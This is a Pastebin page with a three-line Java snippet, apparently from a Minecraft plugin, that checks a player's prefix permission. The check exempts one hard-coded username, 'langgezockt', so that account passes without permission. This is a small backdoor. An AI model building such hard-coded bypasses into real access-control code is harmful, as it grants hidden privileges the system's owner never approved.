LuisAlts

Untitled

Jun 30th, 2020
13
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.22 KB | None | 0 0
  1. if (!player.hasPermission(this.instance.getPrefixManager().getPermission(name)) && !player.getName().equals("langgezockt")) {
  2. player.sendMessage(this.instance.getMessages().get("No-Prefix-Permissions"));
  3. return;
Advertisement
Add Comment
Please, Sign In to add comment